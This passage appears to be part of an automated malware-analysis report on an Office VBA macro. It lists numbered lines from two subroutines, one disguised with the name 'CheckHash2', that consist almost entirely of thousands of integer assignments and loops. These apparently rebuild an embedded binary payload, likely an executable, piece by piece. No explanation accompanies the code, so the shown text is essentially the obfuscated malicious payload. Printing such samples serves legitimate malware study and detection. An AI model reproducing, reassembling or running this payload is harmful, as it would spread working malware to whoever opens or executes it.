                            Y = 891232031

                            4116

                            Y = 856098567

                            4117

                            Y = 1124534283

                            4118

                            Y = 604242948

                            4119

                            Y = 202642452

                            4120

                            Y = 103887153

                            4121

                            Y = 87109937

                            4122

                            Y = 70332721

                            4123

                            Y = 36778289

                            4124

                            Y = 20001073

                            4125

                            For I = 1 To 5

                            4126

                            Y = 0

                            4127

                            Next

                            4128

                            Y = 20066866

                            4129

                            Y = 305279538

                            4130

                            Y = 691155506

                            4131

                            Y = 674312497

                            4132

                            Y = 639310619

                            4133

                            Y = 1007883027

                            4134

                            Y = 1983198517

                            4135

                            Y = - 440549180

                            4136

                            Y = - 3091496

                            4137

                            Y = - 3157289

                            4138

                            Y = - 4341561

                            4139

                            Y = - 5065029

                            4140

                            Y = - 3881012

                            4141

                            Y = - 2894374

                            4142

                            Y = - 2828581

                            4143

                            Y = - 2762788

                            4144

                            Y = - 2631203

                            4145

                            Y = - 2565409

                            4146

                            Y = - 2565666

                            4147

                            Y = - 2631203

                            4148

                            Y = - 2499873

                            4149

                            Y = - 2368032

                            4150

                            Y = - 3420719

                            4151

                            Y = - 6644059

                            4152

                            Y = - 8617846

                            4153

                            Y = - 7236194

                            4154

                            Y = - 4275767

                            4155

                            Y = - 5328455

                            4156

                            Y = - 12302772

                            4157

                            Y = - 13026237

                            4158

                            Y = - 44607136

                            4159

                            Y = - 528317046

                            4160

                            Y = - 4670525

                            4161

                            Y = - 597202321

                            4162

                            Y = - 483775180

                            4163

                            Y = - 13354942

                            4164

                            Y = - 1205590483

                            4165

                            Y = 587202560

                            4166

                            Y = 35133464

                            4167

                            For I = 1 To 9

                            4168

                            Y = 0

                            4169

                            Next

                            4170

                            Y = 254947890

                            4171

                            Y = 1532779870

                            4172

                            Y = - 254618408

                            4173

                            Y = - 1197366876

                            4174

                            Y = - 1302437791

                            4175

                            Y = - 78951087

                            4176

                            Y = - 123098192

                            4177

                            Y = - 2894374

                            4178

                            Y = - 2960167

                            4179

                            Y = - 4407612

                            4180

                            Y = - 4670272

                            4181

                            Y = - 3157546

                            4182

                            For I = 1 To 2

                            4183

                            Y = - 2762788

                            4184

                            Next

                            4185

                            Y = - 4539456

                            4186

                            Y = - 6973798

                            4187

                            Y = - 9078917

                            4188

                            Y = - 42765192

                            4189

                            Y = - 108228975

                            4190

                            Y = - 105531461

                            4191

                            Y = - 2236702

                            4192

                            Y = - 2170653

                            4193

                            Y = - 2368031

                            4194

                            Y = - 2302239

                            4195

                            Y = - 5130821

                            4196

                            Y = - 8223090

                            4197

                            Y = - 7959917

                            4198

                            Y = - 4275767

                            4199

                            Y = - 5262662

                            4200

                            Y = - 4407352

                            4201

                            Y = - 4473145

                            4202

                            Y = - 4538939

                            4203

                            Y = - 4604732

                            4204

                            Y = - 4670524

                            4205

                            Y = - 11644843

                            4206

                            Y = - 11841963

                            4207

                            Y = - 11710377

                            4208

                            Y = 1796544024

                            4209

                            Y = 251658240

                            4210

                            For I = 1 To 8

                            4211

                            Y = 0

                            4212

                            Next

                            4213

                            Y = 20066866

                            4214

                            Y = 758264370

                            4215

                            Y = - 927286081

                            4216

                            Y = - 2499617

                            4217

                            Y = - 2565410

                            4218

                            Y = - 2630947

                            4219

                            Y = - 2696739

                            4220

                            Y = - 2762532

                            4221

                            Y = - 2828325

                            4222

                            Y = - 4209976

                            4223

                            Y = - 4538687

                            4224

                            Y = - 2828581

                            4225

                            Y = - 2696739

                            4226

                            Y = - 4539200

                            4227

                            Y = - 6512733

                            4228

                            Y = - 8354165

                            4229

                            Y = - 76186752

                            4230

                            Y = - 681351318

                            4231

                            Y = - 1791542981

                            4232

                            Y = 1931748388

                            4233

                            Y = 1966158130

                            4234

                            Y = - 1890890419

                            4235

                            Y = - 777278289

                            4236

                            Y = - 1973530

                            4237

                            Y = - 2170909

                            4238

                            Y = - 1973274

                            4239

                            Y = - 4538941

                            4240

                            Y = - 8091759

                            4241

                            Y = - 7499622

                            4242

                            Y = - 4210230

                            4243

                            Y = - 4276023

                            4244

                            Y = - 4341816

                            4245

                            Y = - 4407353

                            4246

                            Y = - 4473145

                            4247

                            Y = - 4538939

                            4248

                            Y = - 5657422

                            4249

                            Y = - 5328461

                            4250

                            Y = - 3880757

                            4251

                            Y = - 492459862

                            4252

                            Y = 637534208

                            4253

                            For I = 1 To 8

                            4254

                            Y = 0

                            4255

                            Next

                            4256

                            Y = 103952946

                            4257

                            Y = 1449156961

                            4258

                            Y = - 2367775

                            4259

                            Y = - 2368032

                            4260

                            Y = - 2499361

                            4261

                            Y = - 2565153

                            4262

                            Y = - 2630946

                            4263

                            Y = - 2696739

                            4264

                            Y = - 3617841

                            4265

                            Y = - 4604736

                            4266

                            Y = - 2828839

                            4267

                            Y = - 2631202

                            4268

                            Y = - 5394252

                            4269

                            Y = - 7170148

                            4270

                            Y = - 8419958

                            4271

                            Y = - 747210114

                            4272

                            Y = 1175194636

                            4273

                            Y = 824123167

                            4274

                            Y = 707603757

                            4275

                            Y = 640758065

                            4276

                            Y = 573649201

                            4277

                            Y = 640758065

                            4278

                            Y = 976368178

                            4279

                            Y = - 2038793605

                            4280

                            Y = - 237314850

                            4281

                            Y = - 1841945

                            4282

                            Y = - 1578774

                            4283

                            Y = - 5262407

                            4284

                            Y = - 8552054

                            4285

                            Y = - 6512728

                            4286

                            Y = - 4209974

                            4287

                            Y = - 4275767

                            4288

                            Y = - 4341559

                            4289

                            Y = - 4407352

                            4290

                            Y = - 4473145

                            4291

                            Y = - 5328713

                            4292

                            Y = - 5525582

                            4293

                            Y = - 4143927

                            4294

                            Y = - 391401806

                            4295

                            Y = 620756992

                            4296

                            For I = 1 To 8

                            4297

                            Y = 0

                            4298

                            Next

                            4299

                            Y = 120730162

                            4300

                            Y = 1517976445

                            4301

                            Y = - 254355238

                            4302

                            Y = - 2302239

                            4303

                            Y = - 2368032

                            4304

                            Y = - 2433824

                            4305

                            Y = - 2499617

                            4306

                            Y = - 2696996

                            4307

                            Y = - 4736321

                            4308

                            Y = - 3354668

                            4309

                            Y = - 3091497

                            4310

                            Y = - 5328460

                            4311

                            Y = - 6906719

                            4312

                            Y = - 7301477

                            4313

                            Y = - 1368822416

                            4314

                            Y = 687997442

                            4315

                            Y = 253368858

                            4316

                            Y = 271659313

                            4317

                            Y = 355545393

                            4318

                            Y = 338768177

                            4319

                            Y = 271659313

                            4320

                            Y = 204550449

                            4321

                            Y = 187773233

                            4322

                            Y = 456274482

                            4323

                            Y = 1684761708

                            4324

                            Y = - 304094750

                            4325

                            Y = - 1776151

                            4326

                            Y = - 1841688

                            4327

                            Y = - 6446680

                            4328

                            Y = - 9143933

                            4329

                            Y = - 4473147

                            4330

                            Y = - 4209974

                            4331

                            Y = - 4275766

                            4332

                            Y = - 4276023

                            4333

                            Y = - 6447196

                            4334

                            Y = - 7039078

                            4335

                            Y = - 5393995

                            4336

                            Y = - 729380468

                            4337

                            Y = 1023410176

                            4338

                            Y = 201326592

                            4339

                            For I = 1 To 8

                            4340

                            Y = 0

                            4341

                            Next

                            4342

                            Y = 53621298

                            4343

                            Y = 439497266

                            4344

                            Y = 1835559273

                            4345

                            Y = - 254354982

                            4346

                            Y = - 2301982

                            4347

                            Y = - 2367775

                            4348

                            Y = - 2433568

                            4349

                            Y = - 3814707

                            4350

                            Y = - 4275513

                            4351

                            Y = - 2499617

                            4352

                            Y = - 5723218

                            4353

                            Y = - 5986130

                            4354

                            Y = - 6117715

                            4355

                            Y = - 1167825045

                            4356

                            Y = 620756992

                            4357

                            Y = 83886080

                            4358

                            Y = 36778289

                            4359

                            Y = 87109937

                            4360

                            Y = 120664369

                            4361

                            Y = 103887153

                            4362

                            Y = 87109937

                            4363

                            Y = 53555505

                            4364

                            For I = 1 To 2

                            4365

                            Y = 36778289

                            4366

                            Next

                            4367

                            Y = 322056754

                            4368

                            Y = 2055899787

                            4369

                            Y = - 85201682

                            4370

                            Y = - 1315602

                            4371

                            Y = - 3289133

                            4372

                            Y = - 8157040

                            4373

                            Y = - 7104609

                            4374

                            Y = - 4078388

                            4375

                            Y = - 4144181

                            4376

                            Y = - 7170662

                            4377

                            Y = - 8815231

                            4378

                            Y = - 7696749

                            4379

                            Y = - 714511248

                            4380

                            Y = 922746880

                            4381

                            Y = 150994944

                            4382

                            For I = 1 To 10

                            4383

                            Y = 0

                            4384

                            Next

                            4385

                            Y = 53621298

                            4386

                            Y = 439497266

                            4387

                            Y = 1969316451

                            4388

                            Y = - 254421030

                            4389

                            Y = - 2236446

                            4390

                            Y = - 2302239

                            4391

                            Y = - 4538942

                            4392

                            Y = - 2959911

                            4393

                            Y = - 4802628

                            4394

                            Y = - 5920594

                            4395

                            Y = - 4867905

                            4396

                            Y = - 209418354

                            4397

                            Y = 905969664

                            4398

                            Y = 100663296

                            4399

                            For I = 1 To 9

                            4400

                            Y = 0

                            4401

                            Next

                            4402

                            Y = 36844082

                            4403

                            Y = 556937778

                            4404

                            Y = - 993342515

                            4405

                            Y = - 1315602

                            4406

                            Y = - 1381395

                            4407

                            Y = - 6249044

                            4408

                            Y = - 9078140

                            4409

                            Y = - 4012595

                            4410

                            Y = - 5657678

                            4411

                            Y = - 11513256

                            4412

                            Y = - 10723224

                            4413

                            Y = - 145401760

                            4414

                            Y = 1392508928

                            4415

                            Y = 184549376

                            4416

                            For I = 1 To 12

                            4417

                            Y = 0

                            4418

                            Next

                            4419

                            Y = 103952946

                            4420

                            Y = 1244803634

                            4421

                            Y = - 254289444

                            4422

                            Y = - 2170397

                            4423

                            Y = - 2959912

                            4424

                            Y = - 4341563

                            4425

                            Y = - 2302238

                            4426

                            Y = - 7697518

                            4427

                            Y = - 7828333

                            4428

                            Y = - 8091505

                            4429

                            Y = - 2044714970

                            4430

                            Y = 301989888

                            4431

                            For I = 1 To 11

                            4432

                            Y = 0

                            4433

                            Next

                            4434

                            Y = 120730162

                            4435

                            Y = 1382771563

                            4436

                            Y = - 101649934

                            4437

                            Y = - 855308

                            4438

                            Y = - 3881012

                            4439

                            Y = - 8552053

                            4440

                            Y = - 5591627

                            4441

                            Y = - 3946547

                            4442

                            Y = - 12697785

                            4443

                            For I = 1 To 2

                            4444

                            Y = - 13618626

                            4445

                            Next

                            4446

                            Y = 1678708755

                            4447

                            Y = 134217728

                            4448

                            For I = 1 To 10

                            4449

                            Y = 0

                            4450

                            Next

                            4451

                            Y = 36844082

                            4452

                            Y = 204616242

                            4453

                            Y = 607269426

                            4454

                            Y = 2121100911

                            4455

                            Y = - 2038811

                            4456

                            Y = - 2104604

                            4457

                            Y = - 3551791

                            4458

                            Y = - 3617841

                            4459

                            Y = - 4736579

                            4460

                            Y = - 9538951

                            4461

                            Y = - 11183262

                            4462

                            Y = - 130005683

                            4463

                            Y = 922746880

                            4464

                            Y = 50331648

                            4465

                            For I = 1 To 12

                            4466

                            Y = 0

                            4467

                            Next

                            4468

                            Y = 573714994

                            4469

                            Y = - 589242143

                            4470

                            Y = - 920844

                            4471

                            Y = - 2499618

                            4472

                            Y = - 7499111

                            4473

                            Y = - 6972766

                            4474

                            Y = - 3880754

                            4475

                            Y = - 11842221

                            4476

                            Y = - 13881801

                            4477

                            Y = - 13947337

                            4478

                            Y = - 1323886564

                            4479

                            Y = 1158088455

                            4480

                            Y = 620822785

                            4481

                            Y = 369098752

                            4482

                            Y = 150994944

                            4483

                            Y = 16777216

                            4484

                            For I = 1 To 5

                            4485

                            Y = 0

                            4486

                            Next

                            4487

                            Y = 221393458

                            4488

                            Y = 825373234

                            4489

                            Y = 1768713581

                            4490

                            Y = - 1668576116

                            4491

                            Y = - 726486092

                            4492

                            Y = - 1907482

                            4493

                            Y = - 1973275

                            4494

                            Y = - 3946549

                            4495

                            Y = - 3025961

                            4496

                            Y = - 6117975

                            4497

                            Y = - 12170157

                            4498

                            Y = - 14603984

                            4499

                            Y = - 734840770

                            4500

                            Y = 553648128

                            4501

                            For I = 1 To 13

                            4502

                            Y = 0

                            4503

                            Next

                            4504

                            Y = 271725106

                            4505

                            Y = - 1278489652

                            4506

                            Y = - 789259

                            4507

                            Y = - 1381395

                            4508

                            Y = - 6709595

                            4509

                            Y = - 7959917

                            4510

                            Y = - 3683888

                            4511

                            Y = - 3815217

                            4512

                            Y = - 6184022

                            4513

                            Y = - 8486265

                            4514

                            Y = - 9605002

                            4515

                            Y = - 195799203

                            4516

                            Y = - 817806775

                            4517

                            Y = - 1556727746

                            4518

                            Y = 1511989540

                            4519

                            Y = 318767104

                            4520

                            For I = 1 To 5

                            4521

                            Y = 0

                            4522

                            Next

                            4523

                            Y = 724709938

                            4524

                            Y = - 505750563

                            4525

                            Y = - 1644310

                            4526

                            Y = - 1710103

                            4527

                            Y = - 1775896

                            4528

                            Y = - 1841432

                            4529

                            Y = - 1907225

                            4530

                            Y = - 4538686

                            4531

                            Y = - 2499361

                            4532

                            Y = - 5723217

                            4533

                            Y = - 11117212

                            4534

                            Y = - 11972264

                            4535

                            Y = - 1690089654

                            4536

                            Y = 335544320

                            4537

                            For I = 1 To 13

                            4538

                            Y = 0

                            4539

                            Next

                            4540

                            Y = 70398514

                            4541

                            Y = 1922932125

                            4542

                            Y = - 394758

                            4543

                            Y = - 460295

                            4544

                            Y = - 6052179

                            4545

                            Y = - 9275776

                            4546

                            Y = - 3617839

                            4547

                            Y = - 3683632

                            4548

                            Y = - 3814961

                            4549

                            Y = - 3880754

                            4550

                            Y = - 3946546

                            4551

                            Y = - 4012595

                            4552

                            Y = - 8354679

                            4553

                            For I = 1 To 2

                            4554

                            Y = - 7104354

                            4555

                            Next

                            4556

                            Y = 822083584

                            4557

                            For I = 1 To 5

                            4558

                            Y = 0

                            4559

                            Next

                            4560

                            Y = 1026699826

                            4561

                            Y = - 1446932

                            4562

                            Y = - 1578261

                            4563

                            Y = - 1578518

                            4564

                            Y = - 1644310

                            4565

                            Y = - 1710103

                            4566

                            Y = - 1775896

                            4567

                            Y = - 4473150

                            4568

                            Y = - 2039068

                            4569

                            Y = - 5328459

                            4570

                            For I = 1 To 2

                            4571

                            Y = - 8551542

                            4572

                            Next

                            4573

                            Y = - 2025502902

                            4574

                            Y = 268435456

                            4575

                            For I = 1 To 14

                            4576

                            Y = 0

                            4577

                            Next

                            4578

                            Y = 1298424932

                            4579

                            Y = - 197123

                            4580

                            Y = - 65794

                            4581

                            Y = - 5722958

                            4582

                            Y = - 9275519

                            4583

                            Y = - 3552046

                            4584

                            Y = - 3617839

                            4585

                            Y = - 3683632

                            4586

                            Y = - 3814961

                            4587

                            Y = - 3880753

                            4588

                            Y = - 3946546

                            4589

                            Y = - 8617852

                            4590

                            For I = 1 To 2

                            4591

                            Y = - 7038561

                            4592

                            Next

                            4593

                            Y = 1056964608

                            4594

                            End Sub

                            LineInstructionMeta Information
                            2965

                            Private Sub CheckHash2()

                            2966

                            Y = 1879068416

                            executed
                            2967

                            Y = 1845519616

                            2968

                            Y = 687876096

                            2969

                            Y = 167775488

                            2970

                            Y = 1327824896

                            2971

                            Y = 536899072

                            2972

                            Y = 1912620288

                            2973

                            Y = 1862300160

                            2974

                            Y = 536900096

                            2975

                            Y = 1862289152

                            2976

                            Y = 1862292480

                            2977

                            Y = 1275076608

                            2978

                            Y = 218128128

                            2979

                            Y = 2560

                            2980

                            Y = 1761625199

                            2981

                            Y = 536898816

                            2982

                            Y = 1744851712

                            2983

                            Y = 536892160

                            2984

                            Y = 1929404672

                            2985

                            Y = 1392517120

                            2986

                            Y = 1912632320

                            2987

                            Y = 1845520640

                            2988

                            Y = 973104896

                            2989

                            Y = 1744851712

                            2990

                            Y = 1023431424

                            2991

                            Y = 1660953088

                            2992

                            Y = 1543518720

                            2993

                            Y = 1929401600

                            2994

                            Y = 1912628480

                            2995

                            Y = 1543533312

                            2996

                            Y = 1962954752

                            2997

                            Y = 1811964416

                            2998

                            Y = 1660971264

                            2999

                            Y = 1660967936

                            3000

                            Y = 1912632320

                            3001

                            Y = 1879075840

                            3002

                            Y = 1845518592

                            3003

                            Y = 1811965184

                            3004

                            Y = 1694510592

                            3005

                            Y = 1694529536

                            3006

                            Y = 218112512

                            3007

                            Y = 2560

                            3008

                            Y = 1711294763

                            3009

                            Y = 1308631040

                            3010

                            Y = 1946185472

                            3011

                            Y = 1174413312

                            3012

                            Y = 671106304

                            3013

                            Y = 1744851712

                            3014

                            Y = 687887104

                            3015

                            Y = 1409294336

                            3016

                            Y = 1694525440

                            3017

                            Y = 218131968

                            3018

                            Y = 2560

                            3019

                            Y = 1879068497

                            3020

                            Y = 1845519616

                            3021

                            Y = 1392517120

                            3022

                            Y = 1392535552

                            3023

                            Y = 1174413312

                            3024

                            Y = 1912631040

                            3025

                            Y = 1107304448

                            3026

                            Y = 1845520640

                            3027

                            Y = 1912627456

                            3028

                            Y = 536901888

                            3029

                            Y = 1660961024

                            3030

                            Y = 1694524160

                            3031

                            Y = 1929409280

                            3032

                            Y = 1459625984

                            3033

                            Y = 1761636864

                            3034

                            Y = 1694528512

                            3035

                            Y = 1090527232

                            3036

                            Y = 536900352

                            3037

                            Y = 822092544

                            3038

                            Y = 167775488

                            3039

                            Y = 1126498304

                            3040

                            Y = 1811964160

                            3041

                            Y = 536898560

                            3042

                            Y = 1744847616

                            3043

                            Y = 1660970240

                            3044

                            Y = 1207986944

                            3045

                            Y = 1929404672

                            3046

                            Y = 671115264

                            3047

                            Y = 218114304

                            3048

                            Y = 2560

                            3049

                            Y = 1627407133

                            3050

                            Y = 1811966976

                            3051

                            Y = 1124081664

                            3052

                            Y = 1694525440

                            3053

                            Y = 1795187456

                            3054

                            Y = 1627408384

                            3055

                            Y = 1744859904

                            3056

                            Y = 671678464

                            3057

                            Y = 218114304

                            3058

                            Y = 2560

                            3059

                            Y = 1811956501

                            3060

                            Y = 1929408256

                            3061

                            Y = 536896768

                            3062

                            Y = 822092544

                            3063

                            Y = 167775488

                            3064

                            Y = 1158742016

                            3065

                            Y = 1677749760

                            3066

                            Y = 1224744960

                            3067

                            Y = 218129920

                            3068

                            Y = 2560

                            3069

                            Y = 1627407139

                            3070

                            Y = 1811966976

                            3071

                            Y = 1392517120

                            3072

                            Y = 1694525440

                            3073

                            Y = 1811966976

                            3074

                            Y = 1392519168

                            3075

                            Y = 1392535552

                            3076

                            Y = 218114304

                            3077

                            Y = 2560

                            3078

                            Y = 1593854987

                            3079

                            Y = 218118656

                            3080

                            Y = 2560

                            3081

                            Y = - 352145698

                            3082

                            Y = 1081193629

                            3083

                            Y = - 1480302718

                            3084

                            Y = - 1039367212

                            3085

                            Y = 2058815488

                            3086

                            Y = 874075740

                            3087

                            Y = - 1341617696

                            3088

                            Y = 293560127

                            3089

                            Y = 54135509

                            3090

                            Y = 33619968

                            3091

                            Y = 265734

                            3092

                            Y = 101584385

                            3093

                            Y = 268501248

                            3094

                            Y = 328989

                            3095

                            Y = 85790209

                            3096

                            Y = 16908293

                            3097

                            Y = 1663045134

                            3098

                            Y = 1912632320

                            3099

                            Y = 1879075840

                            3100

                            Y = 1845518592

                            3101

                            Y = 1811965184

                            3102

                            Y = 1879073024

                            3103

                            For I = 1 To 2

                            3104

                            Y = 1879076864

                            3105

                            Next

                            3106

                            Y = 50360320

                            3107

                            Y = 50926086

                            3108

                            Y = 51646982

                            3109

                            Y = 51384838

                            3110

                            Y = 67965446

                            3111

                            Y = 469827840

                            3112

                            Y = 16785411

                            3113

                            Y = 286393859

                            3114

                            Y = 301998084

                            3115

                            Y = 18875665

                            3116

                            Y = 101782017

                            3117

                            Y = 469828128

                            3118

                            Y = 671356178

                            3119

                            Y = 135336448

                            3120

                            Y = - 507713167

                            3121

                            Y = - 1673336559

                            3122

                            Y = 420611587

                            3123

                            Y = 67634690

                            3124

                            Y = 13

                            3125

                            Y = 33562627

                            3126

                            Y = 236783107

                            3127

                            Y = 303367686

                            3128

                            Y = 68026653

                            3129

                            Y = 234946848

                            3130

                            Y = 234889219

                            3131

                            Y = 302055429

                            3132

                            Y = 331277

                            3133

                            Y = 554828033

                            3134

                            Y = 16916485

                            3135

                            Y = 396802

                            3136

                            Y = 235798787

                            3137

                            Y = 35652892

                            3138

                            Y = 135797761

                            3139

                            Y = 302056480

                            3140

                            Y = 134749233

                            3141

                            Y = 302122758

                            3142

                            Y = 86053409

                            3143

                            Y = 134349344

                            3144

                            Y = 17237000

                            3145

                            Y = 17047826

                            3146

                            Y = 50331648

                            3147

                            Y = 101187616

                            3148

                            Y = 235799296

                            3149

                            Y = 264200

                            3150

                            Y = 68028417

                            3151

                            Y = 134414592

                            3152

                            Y = 234946564

                            3153

                            Y = 33555715

                            3154

                            Y = 101584398

                            3155

                            Y = 235799559

                            3156

                            Y = 117705226

                            3157

                            Y = 134875650

                            3158

                            Y = 235799815

                            3159

                            Y = 85788677

                            3160

                            Y = 301989892

                            3161

                            Y = 2098253

                            3162

                            Y = 537264925

                            3163

                            Y = 486874369

                            3164

                            Y = 100665859

                            3165

                            Y = 235802126

                            3166

                            Y = 1427179528

                            3167

                            Y = 234948355

                            3168

                            Y = 486604805

                            3169

                            Y = 537398789

                            3170

                            Y = 286130435

                            3171

                            Y = 56693085

                            3172

                            Y = 118095904

                            3173

                            Y = 487064352

                            3174

                            Y = 117966853

                            3175

                            Y = 486605600

                            3176

                            Y = 134744069

                            3177

                            Y = 85787399

                            3178

                            Y = 1494374674

                            3179

                            Y = 302057220

                            3180

                            Y = 18875665

                            3181

                            Y = 74256897

                            3182

                            Y = 1829896455

                            3183

                            Y = 486539269

                            3184

                            Y = 537162002

                            3185

                            Y = 74780928

                            3186

                            Y = 2031222816

                            3187

                            Y = 486735881

                            3188

                            Y = 286133774

                            3189

                            Y = 361856

                            3190

                            Y = 242815489

                            3191

                            Y = 235143175

                            3192

                            Y = 235802126

                            3193

                            Y = 33619972

                            3194

                            Y = 67111182

                            3195

                            Y = - 2146365944

                            3196

                            Y = 117965461

                            3197

                            Y = 234947072

                            3198

                            Y = 479821841

                            3199

                            Y = 1897009415

                            3200

                            Y = 235802141

                            3201

                            Y = 304157198

                            3202

                            Y = 235802145

                            3203

                            Y = 487072018

                            3204

                            Y = 487092498

                            3205

                            Y = 236783630

                            3206

                            Y = 268435733

                            3207

                            Y = 1801675074

                            3208

                            Y = 1970238055

                            3209

                            Y = 1867998318

                            3210

                            Y = 1919249266

                            3211

                            Y = 352649216

                            3212

                            Y = 234954002

                            3213

                            Y = 301998085

                            3214

                            Y = 100968832

                            3215

                            Y = 162627602

                            3216

                            Y = 268501792

                            3217

                            Y = 270274588

                            3218

                            Y = 18875420

                            3219

                            Y = 537264641

                            3220

                            Y = - 2146369279

                            3221

                            Y = 18876089

                            3222

                            Y = - 1115680511

                            3223

                            Y = 302319369

                            3224

                            Y = 471929377

                            3225

                            Y = 117840924

                            3226

                            Y = 302907907

                            3227

                            Y = 2098465

                            3228

                            Y = 96829457

                            3229

                            Y = - 2146369504

                            3230

                            Y = 981

                            3231

                            Y = 50333198

                            3232

                            Y = 235802126

                            3233

                            Y = 16973830

                            3234

                            Y = 620891662

                            3235

                            Y = - 2146299872

                            3236

                            Y = 270274761

                            3237

                            For I = 1 To 7

                            3238

                            Y = 270274588

                            3239

                            Next

                            3240

                            Y = 16778268

                            3241

                            Y = 539302926

                            3242

                            Y = 470810897

                            3243

                            For I = 1 To 8

                            3244

                            Y = 470817808

                            3245

                            Next

                            3246

                            Y = 301998085

                            3247

                            Y = 537257344

                            3248

                            Y = - 310373888

                            3249

                            Y = 302063622

                            3250

                            Y = 85774720

                            3251

                            Y = - 2146303968

                            3252

                            Y = 18876109

                            3253

                            Y = 231047185

                            3254

                            Y = 16850950

                            3255

                            Y = 80052241

                            3256

                            Y = 234946816

                            3257

                            Y = 16850954

                            3258

                            Y = - 41938411

                            3259

                            Y = 83890945

                            3260

                            Y = - 2129526752

                            3261

                            Y = 18875905

                            3262

                            Y = 134578450

                            3263

                            Y = 352329737

                            3264

                            Y = 31031313

                            3265

                            Y = 352714771

                            3266

                            Y = 31031313

                            3267

                            Y = 2098190

                            3268

                            Y = 393235

                            3269

                            Y = 235800579

                            3270

                            Y = 18875650

                            3271

                            Y = 83890945

                            3272

                            Y = 320667680

                            3273

                            Y = 856124416

                            3274

                            For I = 1 To 2

                            3275

                            Y = 247562258

                            3276

                            Next

                            3277

                            Y = 314933265

                            3278

                            Y = - 2146317952

                            3279

                            Y = - 981462587

                            3280

                            Y = 315457554

                            3281

                            Y = 554881408

                            3282

                            For I = 1 To 2

                            3283

                            Y = 554836242

                            3284

                            Next

                            3285

                            Y = 18682389

                            3286

                            Y = 487724302

                            3287

                            Y = 1897008641

                            3288

                            Y = 302522642

                            3289

                            Y = - 2146365919

                            3290

                            Y = - 713027131

                            3291

                            Y = 298156049

                            3292

                            Y = - 2146314880

                            3293

                            Y = - 713027131

                            3294

                            Y = 298156049

                            3295

                            Y = 471651712

                            3296

                            For I = 1 To 3

                            3297

                            Y = 471604252

                            3298

                            Next

                            3299

                            Y = 136059932

                            3300

                            Y = 141627933

                            3301

                            Y = - 645918443

                            3302

                            Y = 117706241

                            3303

                            Y = 84412418

                            3304

                            Y = 302055712

                            3305

                            Y = 16778345

                            3306

                            Y = 537135118

                            3307

                            Y = 224989696

                            3308

                            Y = - 2129524473

                            3309

                            Y = 135138833

                            3310

                            Y = 134744072

                            3311

                            Y = 18875912

                            3312

                            Y = 427888897

                            3313

                            Y = 16850948

                            3314

                            Y = 67592

                            3315

                            Y = 3

                            3316

                            Y = 17301504

                            3317

                            Y = 2048

                            3318

                            Y = 503316480

                            3319

                            Y = 65537

                            3320

                            Y = 1461060180

                            3321

                            Y = 1315987826

                            3322

                            Y = 2017816175

                            3323

                            Y = 1953523043

                            3324

                            Y = 1416523625

                            3325

                            Y = 2003792488

                            3326

                            Y = 17564019

                            3327

                            Y = 774964992

                            3328

                            Y = 774909488

                            3329

                            Y = 687865904

                            3330

                            Y = 908328961

                            3331

                            Y = 862139190

                            3332

                            Y = 758462306

                            3333

                            Y = 1717920049

                            3334

                            Y = 845427757

                            3335

                            Y = 909651297

                            3336

                            Y = 1630364467

                            3337

                            Y = 1631007028

                            3338

                            Y = 912339257

                            3339

                            Y = 3160164

                            3340

                            Y = 66816

                            3341

                            Y = 436207616

                            3342

                            Y = 1293221889

                            3343

                            Y = 1869767529

                            3344

                            Y = 1952870259

                            3345

                            Y = 1919894304

                            3346

                            Y = 1634889584

                            3347

                            Y = 1852795252

                            3348

                            Y = 18612224

                            3349

                            Y = 1866667776

                            3350

                            Y = 1869771886

                            3351

                            Y = 1634738284

                            3352

                            Y = 543974766

                            3353

                            Y = 1886220131

                            3354

                            Y = 1852141167

                            3355

                            Y = 116

                            3356

                            Y = 21076

                            3357

                            For I = 1 To 2

                            3358

                            Y = 0

                            3359

                            Next

                            3360

                            Y = 21102

                            3361

                            Y = 8192

                            3362

                            For I = 1 To 5

                            3363

                            Y = 0

                            3364

                            Next

                            3365

                            Y = 21088

                            3366

                            For I = 1 To 2

                            3367

                            Y = 0

                            3368

                            Next

                            3369

                            Y = 1130299392

                            3370

                            Y = 2017817199

                            3371

                            Y = 1767984485

                            3372

                            Y = 1936523374

                            3373

                            Y = 1701998435

                            3374

                            Y = 1818504805

                            3375

                            Y = 108

                            3376

                            Y = 637468672

                            3377

                            Y = 4202496

                            3378

                            For I = 1 To 96

                            3379

                            Y = 0

                            3380

                            Next

                            3381

                            Y = 1441267592

                            3382

                            Y = 0

                            3383

                            Y = 2

                            3384

                            Y = 284

                            3385

                            Y = 24604

                            3386

                            Y = 14364

                            3387

                            Y = 1396986706

                            3388

                            Y = 756415441

                            3389

                            Y = 1191211168

                            3390

                            Y = 415809177

                            3391

                            Y = 580166761

                            3392

                            Y = 1

                            3393

                            Y = 1348221509

                            3394

                            Y = 1701474162

                            3395

                            Y = 1551070307

                            3396

                            Y = 1818650191

                            3397

                            Y = 1953853266

                            3398

                            Y = 1546809957

                            3399

                            Y = 1818650191

                            3400

                            Y = 1953853266

                            3401

                            Y = 1546809957

                            3402

                            Y = 1550475887

                            3403

                            Y = 1701602642

                            3404

                            Y = 1550152545

                            3405

                            Y = 1819440227

                            3406

                            Y = 1701732720

                            3407

                            Y = 1685073516

                            3408

                            Y = 98

                            3409

                            For I = 1 To 102

                            3410

                            Y = 0

                            3411

                            Next

                            3412

                            Y = 262144

                            3413

                            Y = 3

                            3414

                            Y = - 2147483600

                            3415

                            Y = 14

                            3416

                            Y = - 2147483560

                            3417

                            Y = 16

                            3418

                            Y = - 2147483536

                            3419

                            Y = 24

                            3420

                            Y = - 2147483512

                            3421

                            For I = 1 To 3

                            3422

                            Y = 0

                            3423

                            Next

                            3424

                            Y = 196608

                            3425

                            Y = 2

                            3426

                            Y = - 2147483488

                            3427

                            Y = 3

                            3428

                            Y = - 2147483464

                            3429

                            Y = 4

                            3430

                            Y = - 2147483440

                            3431

                            For I = 1 To 3

                            3432

                            Y = 0

                            3433

                            Next

                            3434

                            Y = 65536

                            3435

                            Y = 32512

                            3436

                            Y = - 2147483416

                            3437

                            For I = 1 To 3

                            3438

                            Y = 0

                            3439

                            Next

                            3440

                            Y = 65536

                            3441

                            Y = 1

                            3442

                            Y = - 2147483392

                            3443

                            For I = 1 To 3

                            3444

                            Y = 0

                            3445

                            Next

                            3446

                            Y = 65536

                            3447

                            Y = 1

                            3448

                            Y = - 2147483368

                            3449

                            For I = 1 To 3

                            3450

                            Y = 0

                            3451

                            Next

                            3452

                            Y = 65536

                            3453

                            Y = 0

                            3454

                            Y = 304

                            3455

                            For I = 1 To 3

                            3456

                            Y = 0

                            3457

                            Next

                            3458

                            Y = 65536

                            3459

                            Y = 0

                            3460

                            Y = 320

                            3461

                            For I = 1 To 3

                            3462

                            Y = 0

                            3463

                            Next

                            3464

                            Y = 65536

                            3465

                            Y = 0
